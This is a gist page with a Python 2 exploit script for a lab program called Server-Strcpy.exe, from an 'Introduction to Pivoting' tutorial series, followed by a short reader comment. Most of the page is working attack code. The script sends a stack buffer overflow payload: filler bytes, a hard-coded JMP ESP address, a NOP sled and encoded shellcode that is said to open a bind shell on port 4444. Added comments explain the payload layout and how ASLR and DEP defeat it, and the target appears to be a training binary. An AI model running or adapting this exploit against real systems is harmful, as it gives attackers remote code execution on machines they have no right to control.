Exploit for Server-Strcpy.exe in the Introduction to Pivoting series.
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
import socket, sys
def main(target, port):
    """Send a single oversized message to the Server-Strcpy.exe listener.

    Connects to ``target:port`` over TCP, sends one fixed payload whose layout
    is described below, and closes the socket. Written for Python 2: ``print``
    is used as a statement and the payload is a byte string (``str``).

    Args:
        target: host name or address of the listener.
        port: TCP port; passed through ``int()`` before connecting.

    Returns:
        None. Progress is reported on stdout only.

    Raises:
        socket.error on connect/send failure (no handling is attempted);
        ValueError if ``port`` is not an integer string.

    NOTE(review): the gist describes this as an exploit for a strcpy()-based
    server; the overflowed buffer size is not visible here and is inferred
    only from the 268-byte filler below — confirm against the target binary.
    """
    # 368 bytes, opens a bind TCP shell on port 4444
    # (per the author's comment; the bytes are not decoded here). From the
    # defender's side the observable is one large inbound message followed,
    # on success, by a new listening socket on port 4444 on the host.
    shellcode = (
    "\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
    "\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\x7d\x06\xb8\x9b" +
    "\x95\x4f\x43\x64\x65\x30\xcd\x81\x54\x62\xa9\xc2\xc4\xb2" +
    "\xb9\x87\xe4\x39\xef\x33\x7f\x4f\x38\x33\xc8\xfa\x1e\x7a" +
    "\xc9\xca\x9e\xd0\x09\x4c\x63\x2b\x5d\xae\x5a\xe4\x90\xaf" +
    "\x9b\x19\x5a\xfd\x74\x55\xc8\x12\xf0\x2b\xd0\x13\xd6\x27" +
    "\x68\x6c\x53\xf7\x1c\xc6\x5a\x28\x8c\x5d\x14\xd0\xa7\x3a" +
    "\x85\xe1\x64\x59\xf9\xa8\x01\xaa\x89\x2a\xc3\xe2\x72\x1d" +
    "\x2b\xa8\x4c\x91\xa6\xb0\x89\x16\x58\xc7\xe1\x64\xe5\xd0" +
    "\x31\x16\x31\x54\xa4\xb0\xb2\xce\x0c\x40\x17\x88\xc7\x4e" +
    "\xdc\xde\x80\x52\xe3\x33\xbb\x6f\x68\xb2\x6c\xe6\x2a\x91" +
    "\xa8\xa2\xe9\xb8\xe9\x0e\x5c\xc4\xea\xf7\x01\x60\x60\x15" +
    "\x56\x12\x2b\x72\x9b\x29\xd4\x82\xb3\x3a\xa7\xb0\x1c\x91" +
    "\x2f\xf9\xd5\x3f\xb7\xfe\xcc\xf8\x27\x01\xee\xf8\x6e\xc6" +
    "\xba\xa8\x18\xef\xc2\x22\xd9\x10\x17\xe4\x89\xbe\xc7\x45" +
    "\x7a\x7f\xb7\x2d\x90\x70\xe8\x4e\x9b\x5a\x9f\x48\x55\xbe" +
    "\xcc\x3e\x94\x40\xe3\xe2\x11\xa6\x69\x0b\x74\x70\x05\xe9" +
    "\xa3\x49\xb2\x12\x86\xe5\x6b\x85\x9e\xe3\xab\xaa\x1e\x26" +
    "\x98\x07\xb6\xa1\x6a\x44\x03\xd3\x6d\x41\x23\x9a\x56\x02" +
    "\xb9\xf2\x15\xb2\xbe\xde\xcd\x57\x2c\x85\x0d\x11\x4d\x12" +
    "\x5a\x76\xa3\x6b\x0e\x6a\x9a\xc5\x2c\x77\x7a\x2d\xf4\xac" +
    "\xbf\xb0\xf5\x21\xfb\x96\xe5\xff\x04\x93\x51\x50\x53\x4d" +
    "\x0f\x16\x0d\x3f\xf9\xc0\xe2\xe9\x6d\x94\xc8\x29\xeb\x99" +
    "\x04\xdc\x13\x2b\xf1\x99\x2c\x84\x95\x2d\x55\xf8\x05\xd1" +
    "\x8c\xb8\x36\x98\x8c\xe9\xde\x45\x45\xa8\x82\x75\xb0\xef" +
    "\xba\xf5\x30\x90\x38\xe5\x31\x95\x05\xa1\xaa\xe7\x16\x44" +
    "\xcc\x54\x16\x4d")
    # JMP ESP at 77DF2740
    # Payload layout (each "\xNN" is one byte under Python 2):
    #   268 bytes of 0x41 filler
    #     4 bytes: 0x77DF2740 written little-endian (the gadget address above)
    #    20 bytes of 0x90 (NOP sled)
    #   368 bytes of shellcode
    #   819 bytes of 0xCC padding
    # Total: 1479 bytes. Because the gadget address is hard-coded, the
    # payload only works while the module holding it loads at the same base
    # on every run; per-module ASLR breaks that assumption, and since control
    # is transferred to stack contents, DEP/NX on the stack stops it as well.
    # (Name note: `buffer` shadows the Python 2 builtin of the same name.)
    buffer = "\x41" * 268 + "\x40\x27\xDF\x77"
    buffer += "\x90" * 20 + shellcode + "\xCC" * 819
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, int(port)))
    print "[+] sending payload of length", len(buffer)  # Python 2 print statement
    s.send(buffer)
    s.close()
    print "[+] done"  # printed whether or not the remote side was affected
if __name__ == "__main__":
    # Usage: <script> <target> <port>. Positional arguments are passed through
    # unchecked; fewer than two raises IndexError before main() runs.
    main(sys.argv[1], sys.argv[2])
samouelll Nov 18, 2017

Hi.
Where is the source code of strcpy.server.exe?
